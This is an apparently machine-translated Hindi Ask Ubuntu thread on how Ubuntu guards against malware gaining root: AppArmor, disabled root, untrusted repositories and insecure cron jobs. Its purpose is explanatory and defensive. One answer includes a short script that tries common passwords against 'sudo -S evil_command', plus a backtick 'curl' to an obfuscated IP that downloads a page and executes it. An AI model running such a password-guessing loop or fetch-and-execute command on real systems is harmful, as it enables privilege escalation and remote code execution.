सिस्टम को कैसे सुरक्षित रखा जाता है?


24

मैं समझता हूं कि यदि किसी मालवेयर ने इसे लिनक्स सिस्टम में बनाया है, तो यह विशेष रूप से उपयोगकर्ता के स्तर पर विशेषाधिकार प्राप्त करता है और उपयोगकर्ता की खुद की फाइलों के भीतर कुछ भी बर्बाद कर देता है।

लेकिन क्या वास्तव में मूल-स्तर तक पहुँच प्राप्त करने से मालवेयर को दूर रखा जाता है? क्या यह किसी तरह से पासवर्ड को क्रैक नहीं कर सकता है?


बढ़िया सवाल और जवाब!
NlightNFotis

जवाबों:


20

यह एक जटिल प्रश्न है। उबंटू प्रणाली में सुरक्षा की विभिन्न परतें हैं, जैसे कि AppArmor जैसे जटिल फ्रेमवर्क से लेकर विनम्र कर्नेल चर जैसे mmap_min_addr। आप मिश्रण में मेमोरी रेंडमाइजेशन जैसी कुछ कर्नेल विशेषताएं जोड़ सकते हैं। आप उबंटू विकी पर त्वरित स्पष्टीकरण के साथ उनकी सूची पा सकते हैं ।

एक और महत्वपूर्ण कारक यह है कि अपडेट तेज और आसान दोनों हैं - इसलिए अधिकांश कंप्यूटरों को अंतिम सुरक्षा सुधारों के लिए अपडेट किया जाएगा।

जहाँ तक मुझे पता है, एक हमलावर जिसने आपके कंप्यूटर तक स्थानीय पहुँच प्राप्त की है, कर्नेल विशेषाधिकार को स्केल करने के तीन तरीके हैं:

  1. पासवर्ड क्रैक करें। लेकिन यह वास्तव में मुश्किल होने जा रहा है, पासवर्ड को एन्क्रिप्ट किया गया है, एल्गोरिदम का उपयोग करते हुए बिना किसी ज्ञात दोष के। इसे क्रेक करने में उम्र लग जाएगी।

  2. कर्नेल में बग। लेकिन कर्नेल की सभी सुरक्षा विशेषताएं रास्ते में मिल जाएंगी।

  3. उपयोगकर्ता को पासवर्ड देने के लिए छल करें, यानी सोशल इंजीनियरिंग। बस एक नकली पासवर्ड संवाद दिखाएं या कुछ अन्य चाल का उपयोग करें। यह इसे करने का सबसे आसान तरीका है।

तीसरा बिंदु अभी सबसे कमजोर भेद्यता है।


5
ध्यान दें कि यह "पासवर्ड" एक उपयोगकर्ता का पासवर्ड है जिसमें sudo-to-root विशेषाधिकार है। रूट खाता डिफ़ॉल्ट रूप से अक्षम है। # 3 वास्तव में ऐसा होना सबसे संभव है। इसके अतिरिक्त, यदि आप अविश्वसनीय रिपॉजिटरी स्थापित करते हैं, तो आप उस रिपॉजिटरी को मुफ्त रूट खाते सौंप रहे हैं।
लेकेन्स्टाइन

@Lekensteyn, क्या ?! रूट एक्सेस तक अप्रकाशित रेपो को कैसे जोड़ रहा है? वैसे, आप इसे एक उत्तर के रूप में पोस्ट करना चाह सकते हैं, मैं चाहता हूं कि यह धागा किसी तरह का सामुदायिक विकि हो।
ऑक्सीविवि

सर्वर प्रक्रियाओं के अलावा, Askubuntu पर कोई थ्रेड मौजूद नहीं है। तुम सिर्फ एक पोस्ट किया है टिप्पणी एक करने के लिए इस सवाल का जवाब आपके लिए प्रश्न । मैंने विचार के लिए भोजन के साथ एक उत्तर जोड़ा है।
लेकेन्स्टाइन

@Oxwivi जब आप एक PPA जोड़ते हैं, और एक पैकेज स्थापित करते हैं, तो पैकेज में पहले से लिखी हुई स्क्रिप्ट होती हैं और पोस्ट स्क्रिप्ट होती हैं जो आप जो चाहें कर सकते हैं। यह रूट या मेस के रूप में चलाने के लिए एक सेवा भी स्थापित कर सकता है sudoers
मोनिका को बहाल करना - Sep--

15

स्वयं रूट पासवर्ड क्रैक करना संभव नहीं है, क्योंकि उबंटू डिफ़ॉल्ट रूप से रूट उपयोगकर्ता को अक्षम कर देता है। हालाँकि, यदि आपका उपयोगकर्ता sudo के माध्यम से रूट बन सकता है और आपका पासवर्ड अनुमान / ब्रूट-फ़ोर्स के लिए आसान है, तो आप एक असुरक्षित सिस्टम हैं। उदाहरण स्क्रिप्ट कुछ पासवर्ड का परीक्षण करने की कोशिश कर रहा है:

#!/bin/sh
for pass in password 123 ubuntu pass; do
    echo $pass|sudo -S evil_command
done

एक अविश्वसनीय भंडार जोड़ने से उस भंडार से प्रोग्राम स्थापित किए जा सकते हैं। यहां तक ​​कि अगर आप स्पष्ट रूप से एक एप्लिकेशन इंस्टॉल नहीं करते हैं sudo apt-get install [app-from-repo], जैसे कि रिपॉजिटरी अभी भी अन्य कार्यक्रमों को प्रभावित कर सकती है, तो उबंटू का मानना ​​है कि रिपॉजिटरी में एक निश्चित प्रोग्राम का एक नया संस्करण शामिल है।

अद्यतन प्रक्रिया को रूट के रूप में चलाया जाता है, अन्यथा फ़ाइलों को लिखा नहीं जा सकता है /usr/binया नहीं /etc। एक इंस्टॉलेशन ट्रिगर रूट के रूप में भी चलाया जाता है और मनमाने ढंग से, और संभवतः, हानिकारक कमांड चला सकता है। अब, चिंतित न हों, कार्यक्रमों को अपडेट करने के लिए मैनुअल एक्शन की आवश्यकता होती है और उबंटू रिपॉजिटरी सुरक्षित हैं। विंडोज जैसे क्लोज्ड सोर्स सॉफ्टवेयर पर कभी भी पूरी तरह से भरोसा नहीं किया जा सकता क्योंकि आप दुर्भावनापूर्ण कोड के लिए स्रोत की जांच नहीं कर सकते हैं, लेकिन यदि आप की जरूरत है (तो आप इस तरह sun-java6या फ्लैश के मालिकाना कार्यक्रमों पर लागू नहीं होते हैं ) उबंटू आवेदन के स्रोत की समीक्षा कर सकते हैं ।

जेवियर रिवेरा के अनुसार, कर्नेल बग में मनमाना कोड निष्पादन हो सकता है, लेकिन बगेड सॉफ्टवेयर संभवतः खतरनाक होते हैं, विशेष रूप से छोटी गाड़ी setsuidरूट बायनेरिज़ (बायनेरी जो फ़ाइल मालिक, रूट के तहत चलेगी) और रूट के रूप में चलने वाले अन्य छोटी गाड़ी के कार्यक्रम।

आप अपने सिस्टम पर सुरक्षा छेद बना सकते हैं यदि आप उस पर ध्यान नहीं देते हैं जो आप कर रहे हैं। उदाहरण के लिए, क्रोनॉजर्स की अवधारणा को पूरी तरह से समझने के बिना, आपने एक क्रोनजॉब जोड़ा है /etc/cron.dailyजो आपके घर के फ़ोल्डर में एक प्रोग्राम चलाता है (उदाहरण के लिए /bin/sh /home/your-username/myscript.sh। यदि myscript.sh फ़ाइल आपके द्वारा नष्ट कर दी गई है, तो आपके द्वारा डिलीट किया जा सकता है, एक शोषण दुर्भावनापूर्ण डाल सकता है। कोड myscript.shजिसमें रूट (विशेषाधिकार वृद्धि) के रूप में चलाया जाएगा।

सुरक्षित रहने के लिए, अपने दिमाग का उपयोग करें! यदि आप नहीं जानते कि यह क्या करता है, तो अविश्वसनीय स्रोतों से कमांड न चलाएं। अगर कोई कहता है कि `curl 3221233674`बैक-टिक के साथ भागो , नहीं। 3221233674 लिखने का एक और तरीका है 192.0.32.10(example.com का IP)। तो, यह बराबर होगा:

`curl http://example.com/`

उन बैक-टिक्स के कारण आउटपुट को शेल कमांड के रूप में निष्पादित किया जाता है। सादे अंग्रेजी में, "पृष्ठ http://example.com/ डाउनलोड करें और डाउनलोड किए गए पृष्ठ को निष्पादित करने का प्रयास करें"।

सबसे पहले, आपको दिए गए कमांड में कुछ दुर्भावनापूर्ण नहीं दिखाई देगा। लेकिन अब, आप जानते हैं कि इसका दुरुपयोग भी किया जा सकता है।

हमेशा इंटरनेट की तरह, आप अविश्वसनीय स्रोतों से प्राप्त कमांड / स्क्रिप्ट की जांच करें।


1
उत्तर के लिए धन्यवाद, मुझे आशा है कि आपने मेरे संपादन में कोई आपत्ति नहीं की। अपनी अंग्रेजी सुधारने के लिए मेरे संपादन पर ध्यान दें।
21

2
नहीं, मुझे कोई आपत्ति नहीं है। हर सुधार का स्वागत है :)
Lekensteyn

भले ही, यह एक उत्कृष्ट पोस्ट है, आपके द्वारा उल्लेखित बिंदुओं पर ध्यान दिया जाना चाहिए!
ऑक्सविवि
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.